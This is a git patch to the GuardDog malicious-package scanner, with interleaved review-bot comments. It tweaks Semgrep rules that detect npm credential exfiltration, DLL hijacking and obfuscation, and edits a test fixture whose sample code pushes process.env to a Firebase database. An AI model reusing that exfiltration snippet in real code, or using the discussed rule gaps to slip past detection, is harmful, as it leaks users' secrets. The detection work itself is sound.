From 57cffa813c97efd730d08e2818989b9fb7731c8a Mon Sep 17 00:00:00 2001
From: Sebastian Obregoso
Date: Mon, 13 Jan 2025 19:03:35 +0100
Subject: [PATCH] fixed pending cases

---
guarddog/analyzer/sourcecode/npm-dll-hijacking.yml | 2 --
.../analyzer/sourcecode/npm-exfiltrate-sensitive-data.yml | 8 +++++---
guarddog/analyzer/sourcecode/npm-obfuscation.yml | 2 --
.../analyzer/sourcecode/npm-exfiltrate-sensitive-data.js | 4 ++--
4 files changed, 7 insertions(+), 9 deletions(-)

diff --git a/guarddog/analyzer/sourcecode/npm-dll-hijacking.yml b/guarddog/analyzer/sourcecode/npm-dll-hijacking.yml
index 9388e8f7..5fcd614d 100644
--- a/guarddog/analyzer/sourcecode/npm-dll-hijacking.yml
+++ b/guarddog/analyzer/sourcecode/npm-dll-hijacking.yml
@@ -86,5 +86,3 @@ rules:
- focus-metavariable: $DLL
severity: WARNING
- options:
- symbolic_propagation: true
diff --git a/guarddog/analyzer/sourcecode/npm-exfiltrate-sensitive-data.yml b/guarddog/analyzer/sourcecode/npm-exfiltrate-sensitive-data.yml
index 0a4110df..f285d8b5 100644
--- a/guarddog/analyzer/sourcecode/npm-exfiltrate-sensitive-data.yml
+++ b/guarddog/analyzer/sourcecode/npm-exfiltrate-sensitive-data.yml
@@ -84,12 +84,14 @@ rules:
- pattern: $HTTP. ... .request(...)
- pattern: $HTTP. ... .get(...)
- pattern: $HTTP. ... .post(...)
- - pattern: $HTTP. ... .push(...)
+ - pattern: |
+ $FIRE=$HTTP.child(...)
+ ...
+ $FIRE.push(...)
- pattern: $HTTP. ... .write(...)
- pattern: $HTTP(...)
languages:
- javascript
- typescript
severity: WARNING
- options:
- symbolic_propagation: true
+
diff --git a/guarddog/analyzer/sourcecode/npm-obfuscation.yml b/guarddog/analyzer/sourcecode/npm-obfuscation.yml
index 5cc936e9..dffa30fa 100644
--- a/guarddog/analyzer/sourcecode/npm-obfuscation.yml
+++ b/guarddog/analyzer/sourcecode/npm-obfuscation.yml
@@ -60,5 +60,3 @@ rules:
languages:
- javascript
severity: WARNING
- options:
- symbolic_propagation: true
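Review bot: The replacement alternative `$FIRE=$HTTP.child(...) ... $FIRE.push(...)` in npm-exfiltrate-sensitive-data.yml only matches when the child reference is first stored in a variable, so the chained form `ref.child("env_vars").push(...)`, which the removed `$HTTP. ... .push(...)` alternative did cover, becomes a false negative unless the rest of the rule catches it some other way (the enclosing `pattern-either` starts outside the hunk, so that cannot be confirmed here). Keeping a narrow second alternative next to the new one, `- pattern: $HTTP.child(...).push(...)`, would close that gap without reintroducing whatever over-match the old deep-expression pattern produced. The `symbolic_propagation` option is dropped here and, by pure deletion, in npm-dll-hijacking.yml and npm-obfuscation.yml with no explanation in the rule or the commit message; since that option is what let the rules follow aliases through intermediate assignments, a one-line comment at the removal site, e.g. `# symbolic_propagation disabled: <reason placeholder>`, would keep a later maintainer from silently re-enabling or re-removing it. The added empty line at end of file is whitespace noise that a YAML linter will flag.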
diff --git a/tests/analyzer/sourcecode/npm-exfiltrate-sensitive-data.js b/tests/analyzer/sourcecode/npm-exfiltrate-sensitive-data.js
index f625f89c..234359e1 100644
--- a/tests/analyzer/sourcecode/npm-exfiltrate-sensitive-data.js
+++ b/tests/analyzer/sourcecode/npm-exfiltrate-sensitive-data.js
@@ -66,8 +66,8 @@ function f(){
function f(){
var Firebase = require("firebase");
var ref = new Firebase("https://abcde-fg-1234.firebaseio.com/");
- var dbRef = ref.child("env_vars");
// ruleid: npm-exfiltrate-sensitive-data
+ var dbRef = ref.child("env_vars");
dbRef.push({status : "leaked env vars", message : process.env}, clean());
}
@@ -75,8 +75,8 @@ function f(){
function f(){
var Firebase = require("firebase");
var ref = new Firebase("https://abcde-fg-1234.firebaseio.com/");
- var dbRef = ref.child("env_vars");
// ok: npm-exfiltrate-sensitive-data
+ var dbRef = ref.child("env_vars");
dbRef.push({status : "leaked env vars", message : "anymsg"}, clean());
}
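Review bot: Moving `var dbRef = ref.child("env_vars");` below the `// ruleid:` / `// ok:` annotation in both hunks implies the match now begins at the alias assignment rather than at the `push` call, which means the line GuardDog reports for this finding is the `child()` line and not the statement that sends `process.env`; that is non-obvious to the next person editing the fixture, so a comment above the annotation, e.g. `// annotation sits above child(): the two-statement pattern match starts here`, would keep it from being moved back. The `ok` case still differs from the `ruleid` case only in the pushed payload, so the fixture does not exercise the new requirement that `child()` and `push()` be separate statements; a `ruleid` (or `todoruleid`, if the gap is accepted) fixture for the chained `ref.child("env_vars").push(...)` form would document the coverage the rule is meant to have.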